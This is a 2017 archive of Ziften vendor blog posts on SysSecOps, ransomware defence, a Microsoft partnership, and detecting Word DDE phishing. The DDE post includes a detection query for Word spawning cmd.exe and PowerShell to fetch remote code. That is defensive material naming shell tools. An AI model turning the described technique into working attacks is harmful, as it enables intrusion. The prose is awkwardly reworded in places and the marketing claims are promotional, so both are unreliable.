Monthly Archives: November 2017

SysSecOps Is Something That You Need Right Now – Charles Leaver

Written By Alan Zeichick And Presented By Charles Leaver


SysSecOps. That’s a new term, still unseen by many IT and security administrators – but it’s being talked about within the industry, by analysts, and at technical conferences. SysSecOps, or Systems & Security Operations, describes the practice of uniting security groups and IT operations teams to be able to guarantee the health of enterprise technology – and having the tools to be able to respond most efficiently when problems occur.

SysSecOps focuses on taking apart the information walls, disrupting the silos, that get in between security teams and IT administrators.

IT operations staff exist to make sure that end-users can access applications, and that crucial infrastructure is running 24 × 7. They wish to maximize access and availability, and require the data needed to do that task – like that a brand-new worker must be provisioned, or a disk drive in a RAID array has actually failed, that a new partner needs to be provisioned with access to a secure file repository, or that an Oracle database is ready to be migrated to the cloud. It’s all about innovation to drive business.

Exact Same Data, Different Use-Cases

While making use of endpoint and network monitoring info and analytics are clearly customized to fit the diverse needs of IT and security, it ends up that the underlying raw data is actually the same. The IT and security groups merely are looking at their own domain’s problems and circumstances – and acting based on those use-cases.

Yet in some cases the IT and security groups need to work together. Like provisioning that brand-new service partner: It should touch all the ideal systems, and be done securely. Or if there is an issue with a remote endpoint, such as a mobile device or a mechanism on the Industrial Internet of Things, IT and security might have to collaborate to identify exactly what’s going on. When IT and security share the exact same data sources, and have access to the very same tools, this job ends up being a lot easier – and thus SysSecOps.

Think of that an IT administrator identifies that a server hard drive is nearing total capacity – and this was not expected. Possibly the network had been breached, and the server is now being used to steam pirated movies across the Web. It occurs, and finding and fixing that issue is a job for both IT and security. The data collected by endpoint instrumentation, and showed through a SysSecOps-ready tracking platform, can help both sides working together more efficiently than would occur with standard, distinct, IT and security tools.

SysSecOps: It’s a new term, and a brand-new concept, and it’s resonating with both IT and security teams. You can discover more about this in a brief nine minute video, where I talk to a number of market experts about this topic: “What is SysSecOps?”

Protect Yourself From Microsoft Word Phishing Attacks With Ziften – Charles Leaver

Written By Josh Harriman And Presented By Charles Leaver


An interesting multifaceted attack has actually been reported in a current blog by Cisco’s Talos Intelligence team. I wished to discuss the infection vector of this attack as it’s quite fascinating and something that Microsoft has actually promised not to fix, as it is a function and not a bug. Reports are becoming available about attacks in the wild which are making use of a function in Microsoft Word, called Dynamic Data Exchange (DDE). Information to how this is achieved are reported in this blog from SecureData.

Unique Phishing Attack with Microsoft Word

Attackers continuously look for brand-new ways to breach a company. Phishing attacks are among the most common as opponents are counting on the fact that someone will either open a file sent to them or go to a ‘faked’ URL. From there an exploit on a susceptible piece of software typically gives them access to start their attack.

However in this case, the documents didn’t have a destructive item embedded in the Word doc, which is a preferred attack vector, but rather a sly way of utilizing this function that enables the Word program to connect out to recover the genuine destructive files. In this manner they might hope or rely on a much better success rate of infection as harmful Word files themselves can be scanned and erased before reaching the recipient.

Searching for Suspicious Behaviors with Ziften Zenith

Here at Ziften, we wanted to be able to inform on this behavior for our clients. Finding conditions that display ‘unusual’ behavior such as Microsoft Word generating a shell is interesting and not expected. Taking it a bit further and searching for PowerShell running from that spawned shell and it gets ‘very’ intriguing. By using our Search API, we can discover these habits no matter when they occurred. We do not need the system to be on at the time of the search, if they have run a program (in this case Word) that exhibited these behaviors, we can discover that system. Ziften is always gathering and sending relevant process info which is why we can discover the data without counting on the system state at the time of browsing.

In our Zenith console, I looked for this condition by trying to find the following:

Process → Filepath contains word.exe, Child Process Filepath contains cmd.exe, Child Process commandline includes powershell

This returns the PIDs (Process ID) of the procedures we saw start-up with these conditions. After this we can drill down to see the important details.

In this very first screenshot, we can see information around the process tree (Word spawning CMD with Powershell under that) on the left, and to the right side you can observe information such as the System name and User, plus start time.

Below in the next image, we look at the CMD process and get information regarding what was passed to Powershell.

More than likely when the user had to address this Microsoft Word pop up dialog box, that is when the CMD shell used Powershell to head out and obtain some code that was hosted on the Louisiana Gov site. In the Powershell image shown below we can see more information such as Network Link info when it was reaching out to the site to pull the fonts.txt file.

That IP address ( is in fact the Louisiana Gov site. Often we see interesting data within our Network Connect information that may not match exactly what you expect.

After developing our Saved Search, we can inform on these conditions as they occur throughout the environment. We can likewise develop extensions that change a GPO policy to not permit DDE and even take further action and go and discover these documents and eliminate them from the system if so desired. Having the ability to discover intriguing mixes of conditions within an environment is extremely powerful and we are delighted to have this feature in our offering.

Prevent Devastating Ransomware Attacks With These 4 Actions – Charles Leaver

Written By Alan Zeichick And Presented By Charles Leaver


Ransomware is real, and is threatening individuals, services, schools, health centers, local governments – and there’s no indication that ransomware is stopping. In fact, it’s most likely increasing. Why? Let’s be honest: Ransomware is most likely the single most efficient attack that cyber criminals have actually ever created. Anybody can develop ransomware using easily available tools; any cash received is most likely in untraceable Bitcoin; and if something fails with decrypting someone’s hard disk, the cyber criminal isn’t really affected.

A business is impacted by ransomware every forty seconds, in accordance with some sources, and 60% of malware problems were ransomware. It strikes all sectors. No industry is safe. And with the rise of RaaS (Ransomware-as-a-Service) it’s gon na worsen.

The good news: We can resist. Here’s a four-step fight strategy.

Great Standard Hygiene

It starts with training workers ways to manage malicious emails. There are falsified messages from service partners. There’s phishing and target spearphishing. Some will survive email spam/malware filters; employees have to be taught not to click on links in those messages, or naturally, not to give permission for plugins or apps to be set up.

However, some malware, like ransomware, is going to get through, often making use of out-of-date software or unpatched systems, just like in the Equifax breach. That’s where the next action comes in:

Ensuring that end points are completely patched and totally up-to-date with the latest, most safe and secure operating systems, applications, utilities, device drivers, and code libraries. That way, if there is an attack, the endpoint is healthy, and has the ability to best battle the infection.

Ransomware isn’t really an innovation or security problem. It’s an organization problem. And it’s so much more than the ransom that is demanded. That’s nothing compared to loss of efficiency because of downtime, poor public relations, disgruntled clients if service is disrupted, and the expense of reconstructing lost data. (And that presumes that important intellectual property or protected financial or client health data isn’t stolen.).

What else can you do? Backup, backup, backup, and safeguard those backups. If you don’t have safe, secured backups, you cannot bring back data and core infrastructure in a prompt style. That consists of making daily snapshots of virtual machines, databases, applications, source code, and setup files.

Services require tools to spot, identify, and avoid malware like ransomware from dispersing. This needs continuous visibility and reporting of exactly what’s occurring in the environment – including “zero day” attacks that haven’t been seen before. Part of that is keeping track of endpoints, from the smart phone to the PC to the server to the cloud, to guarantee that endpoints are up-to-date and protected, and that no unexpected changes have been made to their underlying configuration. That way, if a machine is infected by ransomware or other malware, the breach can be identified rapidly, and the device isolated and closed down pending forensics and recovery. If an endpoint is breached, quickly containment is critical.

The Four Tactics.

Great user training. Upgrading systems with patches and fixes. Supporting whatever as frequently as possible. And utilizing tracking tools to help both IT and security groups identify problems, and react quickly to those problems. When it comes to ransomware, those are the four battle-tested strategies we need to keep our companies safe.

You can learn more about this in a brief eight-minute video, where I talk with a number of market professionals about this concern:

Your Security Will Improve With Microsoft And Ziften – Charles Leaver

Written By David Shefter And Presented By Charles Leaver


Recently we announced a partnership with Microsoft that combines Ziften’s Zenith ® systems and security operations platform, and Windows Defender Advanced Threat Protection (ATP) providing a cloud based, “single pane of glass” to identify, see, investigate, and respond to sophisticated cyber-attacks and breaches on Windows, macOS, and Linux-based devices (desktops, laptop computers, servers, cloud, etc).

Windows Defender ATP plus Ziften Zenith is a security service that makes it possible for enterprise clients to identify, investigate, respond and fix innovative risks on their networks, off-network, and in the data center and cloud.

Imagine a single option throughout all the devices in your business, providing scalable, state of the art security in an economical and easy to use platform. Enabling business throughout the world to protect and manage devices through this ‘single pane of glass’ delivers the guarantee of lower operational costs with real improved security providing real time international risk security with details collected from billions of devices worldwide.

Microsoft and Ziften Architecture

The diagram below provides an overview of the service elements and integration between Windows Defender ATP and Ziften Zenith.

Endpoint examination abilities allow you to drill down into security signals and comprehend the scope and nature of a prospective breach. You can submit files for deep analysis, receive the results and take action without leaving the Windows Defender ATP console.

Detect and Contain Risks

With the Windows Defender ATP and Ziften Zenith integration, organizations can easily find and contain threats on Windows, macOS, and Linux systems from a single console. Windows Defender ATP and Ziften Zenith provide:

Based on behavior, cloud-powered, innovative attack detection. Find the attacks that make it past your other defenses (after a breach has been detected).

Rich timeline for forensic examination and mitigation. Quickly investigate the scope of any breach or presumed habits on any machine through a rich, 6-month device timeline.

Built in special threat intelligence knowledge base. Risk intelligence to quickly spot attacks based on monitoring and data from hordes of devices.

The diagram below shows many of the macOS and Linux danger detection and response abilities now available with Windows Defender ATP.

In conclusion, if you’re wanting to secure your endpoints and infrastructure, you need to take a tough look at Windows Defender ATP and Ziften Zenith.